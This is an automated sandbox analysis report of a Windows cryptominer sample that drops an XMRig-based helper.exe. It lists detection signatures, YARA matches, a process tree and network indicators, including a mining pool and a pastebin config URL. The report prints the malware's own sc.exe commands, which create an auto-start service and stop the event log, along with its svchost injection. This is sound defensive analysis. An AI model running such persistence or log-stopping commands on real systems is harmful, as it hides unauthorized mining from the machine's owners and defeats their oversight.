Edit tour

Windows Analysis Report
nbtypsfikkad.exe

Overview

General Information

Sample name:nbtypsfikkad.exe
Analysis ID:1635471
MD5:8bbc3cca3905e7ada419a806de48006c
SHA1:d9527797784197257a37c743da36f4de8197e924
SHA256:76de12fc1c2446150168ccb2520dea6b5f30ab53fb5cfae8926abcebf5c8364d
Tags:exeuser-aachum
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to a pastebin service (likely for C&C)
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • svchost.exe (PID: 7756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • nbtypsfikkad.exe (PID: 7812 cmdline: "C:\Users\user\Desktop\nbtypsfikkad.exe" MD5: 8BBC3CCA3905E7ADA419A806DE48006C)
    • sc.exe (PID: 7844 cmdline: C:\Windows\system32\sc.exe delete "HELPER" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7896 cmdline: C:\Windows\system32\sc.exe create "HELPER" binpath= "C:\ProgramData\helper\helper.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7944 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7952 cmdline: C:\Windows\system32\sc.exe start "HELPER" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • helper.exe (PID: 8032 cmdline: C:\ProgramData\helper\helper.exe MD5: 8BBC3CCA3905E7ADA419A806DE48006C)
    • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 8072 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7236 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7328 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7404 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7512 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3640 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 2304 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000003.1252525883.00000239B6669000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000000C.00000002.2457793221.00000239B5E81000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000000C.00000002.2458192691.00000239B6673000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 13 entries
              SourceRuleDescriptionAuthorStrings
              10.3.helper.exe.17e8e2f0000.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                10.3.helper.exe.17e8e2f0000.2.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x36fe08:$a1: mining.set_target
                • 0x362030:$a2: XMRIG_HOSTNAME
                • 0x3649a8:$a3: Usage: xmrig [OPTIONS]
                • 0x362008:$a4: XMRIG_VERSION
                10.3.helper.exe.17e8e2f0000.2.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                • 0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                10.3.helper.exe.17e8e2f0000.2.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                • 0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu
                • 0x3b9400:$s3: \\.\WinRing0_
                • 0x366fa8:$s4: pool_wallet
                • 0x3613d8:$s5: cryptonight
                • 0x3613e8:$s5: cryptonight
                • 0x3613f8:$s5: cryptonight
                • 0x361408:$s5: cryptonight
                • 0x361420:$s5: cryptonight
                • 0x361430:$s5: cryptonight
                • 0x361440:$s5: cryptonight
                • 0x361458:$s5: cryptonight
                • 0x361468:$s5: cryptonight
                • 0x361480:$s5: cryptonight
                • 0x361498:$s5: cryptonight
                • 0x3614a8:$s5: cryptonight
                • 0x3614b8:$s5: cryptonight
                • 0x3614c8:$s5: cryptonight
                • 0x3614e0:$s5: cryptonight
                • 0x3614f8:$s5: cryptonight
                • 0x361508:$s5: cryptonight
                • 0x361518:$s5: cryptonight
                12.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  Click to see the 7 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\helper\helper.exe, ParentImage: C:\ProgramData\helper\helper.exe, ParentProcessId: 8032, ParentProcessName: helper.exe, ProcessCommandLine: svchost.exe, ProcessId: 8072, ProcessName: svchost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\helper\helper.exe, ParentImage: C:\ProgramData\helper\helper.exe, ParentProcessId: 8032, ParentProcessName: helper.exe, ProcessCommandLine: svchost.exe, ProcessId: 8072, ProcessName: svchost.exe
                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "HELPER" binpath= "C:\ProgramData\helper\helper.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "HELPER" binpath= "C:\ProgramData\helper\helper.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nbtypsfikkad.exe", ParentImage: C:\Users\user\Desktop\nbtypsfikkad.exe, ParentProcessId: 7812, ParentProcessName: nbtypsfikkad.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "HELPER" binpath= "C:\ProgramData\helper\helper.exe" start= "auto", ProcessId: 7896, ProcessName: sc.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7756, ProcessName: svchost.exe

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nbtypsfikkad.exe", ParentImage: C:\Users\user\Desktop\nbtypsfikkad.exe, ParentProcessId: 7812, ParentProcessName: nbtypsfikkad.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7944, ProcessName: sc.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-11T17:45:00.975564+010020542471A Network Trojan was detected104.20.3.235443192.168.2.449712TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\ProgramData\helper\helper.exeReversingLabs: Detection: 76%
                  Source: nbtypsfikkad.exeVirustotal: Detection: 70%Perma Link
                  Source: nbtypsfikkad.exeReversingLabs: Detection: 76%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability

                  Bitcoin Miner

                  barindex
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.3.helper.exe.17e8e2f0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.helper.exe.17e8e2f0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000003.1252525883.00000239B6669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2457793221.00000239B5E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2458192691.00000239B6673000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000003.1213867902.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000003.1252371829.00000239B6669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: helper.exe PID: 8032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8072, type: MEMORYSTR
                  Source: unknownDNS query: name: xmr-eu1.nanopool.org
                  Source: helper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                  Source: helper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                  Source: helper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                  Source: helper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                  Source: helper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: helper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: nbtypsfikkad.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: helper.exe, 0000000A.00000003.1212910647.0000017E8E1E0000.00000004.00000001.00020000.00000000.sdmp

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.3.235:443 -> 192.168.2.4:49712
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficTCP traffic: 192.168.2.4:49711 -> 141.94.23.83:10343
                  Source: global trafficTCP traffic: 192.168.2.4:49715 -> 162.19.224.121:10343
                  Source: global trafficTCP traffic: 192.168.2.4:56569 -> 162.159.36.2:53
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /raw/7ufXNeU9 HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
                  Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                  Source: global trafficDNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
                  Source: svchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
                  Source: svchost.exe, 0000000C.00000002.2458337362.00000239B66CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
                  Source: svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crle
                  Source: svchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crlqd
                  Source: helper.exe, 0000000A.00000003.1212910647.0000017E8E1E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: helper.exe, 0000000A.00000003.1212910647.0000017E8E1E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: helper.exe, 0000000A.00000003.1212910647.0000017E8E1E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: helper.exe, 0000000A.00000003.1212910647.0000017E8E1E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: svchost.exe, 00000000.00000002.2458802371.000001F95BA86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B997000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
                  Source: svchost.exe, 0000000C.00000002.2458337362.00000239B66CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457763059.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2457835053.00000239B5E9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B933000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1203751734.000001F95B997000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: svchost.exe, 00000000.00000003.1203751734.000001F95B8E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: svchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2458097083.00000239B6643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1213867902.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7ufXNeU9
                  Source: svchost.exe, 0000000C.00000002.2457693680.00000239B5E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7ufXNeU9--cinit-stealth-targets=Taskmgr.exe
                  Source: svchost.exe, 0000000C.00000003.1213867902.00000239B5E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7ufXNeU9Taskmgr.exe
                  Source: svchost.exe, 0000000C.00000002.2458097083.00000239B6645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/7ufXNeU9e
                  Source: helper.exe, 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712

                  System Summary

                  barindex
                  Source: 10.3.helper.exe.17e8e2f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 10.3.helper.exe.17e8e2f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 10.3.helper.exe.17e8e2f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 12.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 12.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 12.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 10.3.helper.exe.17e8e2f0000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 10.3.helper.exe.17e8e2f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 10.3.helper.exe.17e8e2f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 0000000C.00000002.2455424304.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 0000000A.00000003.1213666301.0000017E8E2F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: Process Memory Space: helper.exe PID: 8032, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 8072, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_0000000140001394 NtSetInformationWorkerFactory,11_2_0000000140001394
                  Source: C:\ProgramData\helper\helper.exeFile created: C:\Windows\TEMP\mmxeblqzpfkl.sysJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_000000014000315011_2_0000000140003150
                  Source: C:\Windows\System32\conhost.exeCode function: 11_2_00000001400026E011_2_00000001400026E0
                  Source: 10.3.helper.exe.17e8e2f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 10.3.helper.exe.17e8e2f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 10.3.helper.exe.17e8e2f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 12.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 12.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 12.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
